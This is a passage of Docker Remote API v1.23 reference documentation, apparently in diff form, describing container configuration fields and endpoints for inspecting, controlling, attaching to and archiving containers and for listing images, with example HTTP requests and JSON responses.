**Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]` + - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited. + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **UsernsMode** - Sets the usernamespace mode for the container when usernamespace remapping option is enabled. + supported values are: `host`. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container users to mount volumes. + - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.23/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.23/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.23/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "pids_stats": { + "current": 3 + }, + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.23/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.23/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update configuration of one or more containers. + +**Example request**: + + POST /v1.23/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + "RestartPolicy": { + "MaximumRetryCount": 4, + "Name": "on-failure" + }, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.23/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.23/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.23/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.23/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.23/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.23/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.23/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.23/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.23/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.23/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.23/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + 